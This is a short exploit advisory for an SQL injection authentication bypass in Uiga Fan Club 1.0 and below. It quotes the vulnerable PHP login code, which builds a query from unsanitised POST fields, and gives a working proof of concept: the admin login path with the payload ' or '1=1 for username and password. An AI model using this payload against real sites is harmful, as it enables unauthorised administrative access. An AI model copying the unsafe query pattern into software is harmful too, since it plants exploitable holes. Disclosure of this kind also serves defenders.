Uiga Fan Club versions 1.0 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.
82ca194c6ceb2fd482e31b50c5405010c2fffc5ee351d7aade3616b7f021f788
# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
###########################################################################
# Author: cr4wl3r
# Download: http://www.scriptdevelopers.net/download/uigafanclub.zip
###########################################################################
#if (isset($_POST['admin_name']))
# {
# $admin_name=$_POST['admin_name'];
# $admin_password=$_POST['admin_password'];
#
#
# if(empty($admin_name))
# {
# $errorMessage=warning." Username is empty!";
# }
# elseif(empty($admin_password))
# {
# $errorMessage=warning." Password is empty!";
# }
#
#
# else
# {
# $sql="SELECT *
# FROM admin
# WHERE admin_name='$admin_name' and admin_password='$admin_password'";
#
###########################################################################
###############################################
PoC: [path]/admin/admin_login.php
Username: ' or '1=1
password: ' or '1=1
###############################################